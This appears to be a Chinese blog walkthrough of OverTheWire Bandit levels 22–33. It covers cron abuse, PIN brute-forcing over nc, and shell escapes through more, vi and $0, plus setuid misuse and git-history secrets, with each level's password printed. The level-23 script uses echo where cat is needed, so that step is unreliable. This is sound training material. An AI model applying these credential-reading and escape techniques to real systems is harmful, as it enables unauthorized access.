1. Level 22

1.1. 关卡目标

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

1.2. 解决方案

这关明显是上一关的升级版…

题目还说了得学会看懂别人写的 shell 脚本, 也就是说这题涉及到了些 shell 脚本的知识

不过这是后话, 我们先进入题目提示的目录看看

1
2
$ ls /etc/cron.d/
atop cronjob_bandit22 cronjob_bandit23 cronjob_bandit24

跟上一题一样的做法, 直接看下一关的 cronjob

1
2
3
$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
1
2
3
4
5
6
7
8
9
$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

这里如果大家有 shell 脚本基础的话, 就很容易看懂了

我稍稍解释几点:

  • $() 里执行的是命令
  • 变量可以直接创建, 用的时候需要加前缀 $

其他的都可以自行去了解

脚本的功能大概是将一个字符串转成 MD5 后再将结果分割并取其 MD5

因为这脚本是用户 bandit23 的, 所以我们直接把这脚本里的关键变量用常量代替就行

1
2
3
4
$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
1
bandit23_password = jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

2. Level 23

2.1. 关卡目标

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

2.2. 解决方案

这一关又是上一关的升级版, 我们不仅得会看, 还得会写

提示里还说到我们写的脚本被执行以后就会被删除, 让我们最好备份一下

但是我们不知道脚本得写到哪里, 所以先跟上一关一样查看下一关的脚本

1
2
$ ls /etc/cron.d/
atop cronjob_bandit22 cronjob_bandit23 cronjob_bandit24
1
2
3
$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done

这里 timeout-s 选项指定了命令执行超时时发送的信号, 9 对应的是杀死进程信号

附信号表:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM
16) SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ
26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR
31) SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3
38) SIGRTMIN+4 39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8
43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7
58) SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2
63) SIGRTMAX-1 64) SIGRTMAX

反正脚本会在 60 秒内执行完, 执行结果可能不是即时的…

那么 shell 脚本就很好写了, 仿照上一关的脚本就行

不过有个问题, 就是密码写到哪里?

其实跟第 12 关是类似的, 我们需要在 /tmp 目录下新建个文件夹里面放东西进去

而且其他地方我们都没有权限…

1
2
$ mkdir /tmp/ylsword_24
$ cd /tmp/ylsword_24

然后我们用 vim 直接写个 shell 脚本, 写好再拷贝过去

但是也有个小问题, 就是我们直接创建并没有脚本的执行权限, 所以还得设置一下

1
/tmp/ylsword_24$ vim ylsword.sh
ylsword.sh
1
2
3
#!/bin/bash

echo /etc/bandit_pass/bandit24 > /tmp/ylsword_24/password
1
/tmp/ylsword_24$ chmod 777 ylsword.sh

这里还有个坑点, 就是文件夹的权限

我们可以列出一下当前文件夹的信息

1
2
3
4
5
/tmp/ylsword_24$ ls -al
total 305928
drwxrwx--- 2 bandit23 root 4096 Apr 20 21:03 .
drwxrws-wt 1 root root 313204736 Apr 20 21:03 ..
-rwxrwxrwx 1 bandit23 root 70 Apr 20 20:38 ylsword.sh

可以看到, 除了 root 用户组以外的用户是没有权限的, 故而我们还要给这个文件夹添加权限, 否则文件写不进来

1
/tmp/ylsword_24$ chmod 777 .

然后再拷贝脚本过去

1
/tmp/ylsword_24$ cp ylsword.sh /var/spool/bandit24

等待不超过 1 分钟的时间, 再看看当前文件夹

1
2
3
4
/tmp/ylsword_24$ ls
password ylsword.sh
/tmp/ylsword_24$ cat password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
1
bandit24_password = UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

3. Level 24

3.1. 关卡目标

A daemon is listening on port 30002 and will give you the password for
bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode.
There is no way to retrieve the pincode except by going through all of the 10000
combinations, called brute-forcing.

3.2. 解决方案

这关明显是想让我们写脚本爆破对应的密码

回想一下之前类似的题目(第 14 关), 首先我们得判断是用 nc 还是 openssl

1
2
3
4
$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1234
Wrong! Please enter the correct pincode. Try again.

看来是直接传就行了, 注意这里提示我们要传当前关的密码以及 pincode, 我随便输了个 pincode, 运气没那么好,是错的…

这里其实我们就很好写脚本了, 不过写的脚本还是得放到我们自己的 /tmp 文件夹里

由于上一关我们创建的临时文件夹已经给了权限了, 所以我们可以复用上一关的临时文件夹

不过问题在于, 爆破密码也有两种方法:

  1. 一边构造密码序列一边将结果重定向输出到 nc 的标准输入
  2. 先把所有的密码序列输出到文件, 然后将文件重定向到标准输入

这关经过测试, 应该是第二种方法比较快, 而且这个开放的端口连的人太多是会阻塞掉的…

也就是说有时候你连 nc 连都连不上, 更不说写脚本了, 只能等别人爆破完了才行…

这里我用第二种方法做演示

1
2
$ cd /tmp/ylsword_24
/tmp/ylsword_24$ vim generatelist.sh
generatelist.sh
1
2
3
4
5
6
7
#!/bin/bash

level24_password="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for i in $(seq -w 9999); do
echo $level24_password $i >> passlist.txt
done

这里的 $(seq -w 9999) 生成了一个 0000 ~ 9999 的数字序列, 实际上也可以用 {0000..9999} 代替

1
2
/tmp/ylsword_24$ chmod 777 generatelist.sh
/tmp/ylsword_24$ ./generatelist.sh

然后我们就有个字典了, 这里我们不另外写个脚本爆破了, 可以用一条命令搞定

1
2
3
/tmp/ylsword_24$ cat passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.

因此这里还有个比较严重的问题, 就是脚本执行了一段时间, 你还没把密码给逐个爆破一遍, 服务器就告诉你超时了…

所以…我们还得分段去爆破…

1
2
3
/tmp/ylsword_24$ head -n 3000 passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.

经过测试, 爆前面 3000 个都会超时…玩尼玛(摔)

然后我试了下直接爆后面的 1000 个

1
2
3
4
5
6
/tmp/ylsword_24$ tail -n 1000 passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting.

这辣鸡题目终于出来结果了~~

实际上我们可以写个脚本分段循环来爆, 不过用 shell 脚本不太好写, 大家也可以用 python 来写, 会更加好写…

如果这题大家没做出来, 知道原理就可以过了, 毕竟我后面试了很多次也是连不上的…

另外, 写复杂些的 shell 脚本建议先在自己的 Linux 系统上测试下功能

1
bandit25_password = uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

4. Level 25

4.1. 关卡目标

Logging in to bandit26 from bandit25 should be fairly easy…
The shell for user bandit26 is not /bin/bash, but something else.
Find out what it is, how it works and how to break out of it.

4.2. 解决方案

这一关看起来有点像第 18

不过我们先登录这关进去看看, 毕竟我们也没密码啊…

1
2
bandit25@bandit:~$ ls
bandit26.sshkey

有密钥文件, 好像跟第 13 关一样? 但是感觉应该没有那么简单

不过我们还是试试吧, 把密钥拉到本机, 然后试试 ssh

1
2
3
4
LengSword:~$ ssh -i sshkey -p 2220 bandit26@bandit.labs.overthewire.org
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
...
Connection to bandit.labs.overthewire.org closed.

ssh 一连上去就断了

后面加上执行命令也还是不行, 没有东西出来

再仔细看看题目, 题目说第 26 关的 shell 不是 /bin/bash

实际上查看用户的 shell 我们可以通过查看 /etc/passwd 这一文件得到

chsh 也是更改的这个文件从而更改指定用户的默认 shell

1
2
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

这里我们很明显看到默认 shell 变成了 /usr/bin/showtext 这一文件

然后我们检测下这是什么文件

1
2
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable

是脚本文件, 我们直接输出来看看

1
2
3
4
5
6
7
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0

这里我们发现它把终端的环境变量 TERM 给改变了

那么我们得怎么用 ssh 连上去并且在 shell 退出之前拿到密码文件的内容呢?

首先我介绍一个关于 ssh 命令比较少见的选项 -t, 它可以强制分配 伪终端

通过 man 可以查询到 -t 选项的解释

-t

Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

关于终端与伪终端的知识 这里给出两篇学习文章

为什么我们要让它强制分配个伪终端? 因为它改变了终端类型, 导致我们连上去也没有个终端可以交互

接下来的问题就是如何让我们能进入到 more 的模式里而不会退出

或者说如何在 more 里面执行命令获取当前关的密码

答案就是缩小我们终端模拟器的大小, 使得当前显示的行数足够少, 这样就不会直接退出

这里利用到 more 的特性. 即如果 more 查看某个文件内容能全部显示在终端上, 那么跟 cat 查看文件内容的效果是一样的

经测试, 至多是 6 行才能使得 more 不会完全显示所有内容

也许终端模拟器不一样会有所差别, 大家可以自己去试试

那么问题来了, 下一步该怎么做?

我们在本地自己试试用 more, 进入查看状态后输入 ? 字符可以看到其指令

其中, v 可以让我们在 more 查看状态的当前行进入到 vi 的编辑模式

于是后面就转变成 vi 如何执行命令获取当前关的密码文件内容了

下面给出具体做法:

1
2
3
4
5
6
7
8
9
10
LengSword:~$ ssh -i sshkey -p 2220 -t bandit26@bandit.labs.overthewire.org
...
[more]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
--More--(83%)
[[v]]
1
2
3
4
5
6
7
8
[vi]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
"~/text.txt" [readonly] 6L, 258C
[[:r /etc/bandit_pass/bandit26]]
1
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

这道题真的难, 感觉这种题应该是 Linux 逃逸的题目了

1
bandit26_password = 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

5. Level 26

5.1. 关卡目标

Good job getting a shell! Now hurry and grab the password for bandit27!

5.2. 解决方案

这题我们用得到了的密码按照上一关的方法(即缩小终端)正常连上去

我们从上一关可以得知: 问题出于默认 shell 被改变了

那么我们改回来不就可以了

同样的, 先进入 vi 的状态

1
2
3
4
5
6
7
8
9
[vi]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
"~/text.txt" [readonly] 6L, 258C
[[:set shell=/bin/bash]]
[[:shell]]

然后正常的 shell 回来了

1
2
3
4
$ ls
bandit27-do text.txt
$ file bandit27-do
bandit27-do: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8e941f24b8c5cd0af67b22b724c57e1ab92a92a1, not stripped

这个是个执行文件, 我们执行一次看看怎么用

1
2
3
$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id

那么我们直接用这个就能拿到下一关的密码了

1
2
$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
1
bandit27_password = 3ba3118a22e93127a4ed485be72ef5ea

6. Level 27

6.1. 关卡目标

There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.

Clone the repository and find the password for the next level.

6.2. 解决方案

看起来很简单的一关, 就是 git 的简单使用

我们先弄个这关的临时文件夹用于放东西

1
2
$ mkdir /tmp/ylsword_27
$ cd /tmp/ylsword_27

然后直接 clone, 密码是跟这关的一样的

1
2
3
4
5
6
7
8
9
10
/tmp/ylsword_27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
/tmp/ylsword_27$ ls
repo
/tmp/ylsword_27$ cd repo
1
2
3
4
/tmp/ylsword_27/repo$ ls
README
/tmp/ylsword_27/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
1
bandit28_password = 0ef186ac70e04ea33b4c1853d2526fa2

7. Level 28

7.1. 关卡目标

There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.

Clone the repository and find the password for the next level.

7.2. 解决方案

前面跟上一题差不多

直接贴过程吧

1
2
$ mkdir /tmp/ylsword_28
$ cd /tmp/ylsword_28
1
2
3
4
5
6
7
8
9
10
11
/tmp/ylsword_28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
...
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
/tmp/ylsword_28$ ls
repo
/tmp/ylsword_28$ cd repo
1
2
3
4
5
6
7
8
9
10
/tmp/ylsword_28/repo$ ls
README.md
/tmp/ylsword_28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

根据这题是考的 git, 猜测这应该是修改后的版本

因此, 我们可以 git log 看看历史 commit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/tmp/ylsword_28/repo$ git log
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

fix info leak

commit 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

add missing data

commit b67405defc6ef44210c53345fc953e6a21338cc7
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

initial commit of README.md

很明显了, 那我们直接查看当前 commit 的详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/tmp/ylsword_28/repo$ git show
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

fix info leak

diff --git a/README.md b/README.md
index 3f7cee8..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials

- username: bandit29
-- password: bbc96594b4e001778eee9975372716b2
+- password: xxxxxxxxxx
1
bandit29_password = bbc96594b4e001778eee9975372716b2

8. Level 29

8.1. 关卡目标

There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.

Clone the repository and find the password for the next level.

8.2. 解决方案

前面的不详细说了

把东西 clone 到我们的目录, 然后进入目录

1
2
3
4
5
6
7
8
9
10
/tmp/ylsword_29/repo$ ls
README.md
/tmp/ylsword_29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

生产环境, 我们很容易想到分支

git 里默认主分支是 master, 开发用的分支一般 dev

不过我们先看看有什么分支

1
2
3
4
5
6
/tmp/ylsword_29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev

然后转到 dev 分支

1
2
3
/tmp/ylsword_29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'

然后直接拉取到本地

1
2
3
/tmp/ylsword_29/repo$ git pull
...
Already up-to-date.

看看记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/tmp/ylsword_29/repo$ git log
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add data needed for development

commit a8af722fccd4206fc3780bd3ede35b2c03886d9b
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add gif2ascii

commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

fix username

commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

initial commit of README.md
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/tmp/ylsword_29/repo$ git show
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add data needed for development

diff --git a/README.md b/README.md
index 1af21d3..39b87a8 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for bandit30 of bandit.
## credentials

- username: bandit30
-- password: <no passwords in production!>
+- password: 5b90576bedb2cc04c86a9e924ce42faf
1
bandit30_password = 5b90576bedb2cc04c86a9e924ce42faf

9. Level 30

9.1. 关卡目标

There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.

Clone the repository and find the password for the next level.

9.2. 解决方案

跟上一关一样, 前面的拉取不说了

1
2
3
4
/tmp/ylsword_30/repo$ ls
README.md
/tmp/ylsword_30/repo$ cat README.md
just an epmty file... muahaha

看看记录

1
2
3
4
5
6
/tmp/ylsword_30/repo$ git log
commit 3aa4c239f729b07deb99a52f125893e162daac9e
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:44 2018 +0200

initial commit of README.md

没有东西

再看看分支

1
2
3
4
/tmp/ylsword_30/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master

没啥异常

那么看看 tag

1
2
/tmp/ylsword_30/repo$ git tag
secret

貌似找到了…

1
2
/tmp/ylsword_30/repo$ git show secret
47e603bb428404d265f59c42920d81e5

这个其实就是下一关的密码…

1
bandit31_password = 47e603bb428404d265f59c42920d81e5

10. Level 31

10.1. 关卡目标

There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo. The password for the user bandit31-git is the same as for the user bandit31.

Clone the repository and find the password for the next level.

10.2. 解决方案

还是 git 题, 所以不解释前面的

1
2
3
4
5
6
7
8
9
/tmp/ylsword_31/repo$ ls
README.md
/tmp/ylsword_31/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master

按照提示直接搞个文件

1
2
3
/tmp/ylsword_31/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/ylsword_31/repo$ ls
key.txt README.md

然后把文件加进仓库中

1
2
3
4
/tmp/ylsword_31/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.

这个还设置了 .gitignore 文件

那么我们可以删掉这文件也可以直接强加

我选择直接淦

1
2
3
4
5
6
7
8
/tmp/ylsword_31/repo$ git add -f key.txt
/tmp/ylsword_31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
(use "git reset HEAD <file>..." to unstage)

new file: key.txt

commit 上去

1
2
/tmp/ylsword_31/repo$ git commit
...

push

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/tmp/ylsword_31/repo$ git push
...
Counting objects: 3, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 329 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
1
bandit32_password = 56a9bf19c63d650ce78e6ec0354ee45e

11. Level 32

11.1. 关卡目标

After all this git stuff its time for another escape. Good luck!

11.2. 解决方案

git 完以后, 又开始玩逃逸题了…

一登进去就这样了:

1
2
WELCOME TO THE UPPERCASE SHELL
>>

尝试各种命令都是失败的

1
2
3
4
>> ls
sh: 1: LS: not found
>> cat
sh: 1: CAT: not found

然后这题得尝试不会被过滤掉的字符

尝试到 $ 是可以的, 而 $0 其实是代表当前用户的 shell

$0 输入进去

1
2
>> $0
$

成功逃逸出用户的默认 shell

1
2
3
4
5
$ ls
uppershell
$ ls -l
total 8
-rwsr-x--- 1 bandit33 bandit32 7556 Oct 16 2018 uppershell

这里如果不看下文件的权限可能就漏了, 不知道咋做了

我们看到这个文件是所有者是 bandit33, 而且有 setuid 权限位

所以, 这是跟之前类似的题目一样的, 我们既然还在这个 shell 程序之中, 就可以直接拿到下一关的密码

1
2
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee
1
bandit33_password = c9c3199ddf4121b10cf581a98d51caee

12. Level 33

12.1. 关卡目标

At this moment, level 34 does not exist yet.

12.2. 解决方案

我也不知道咋做…

[End]

评论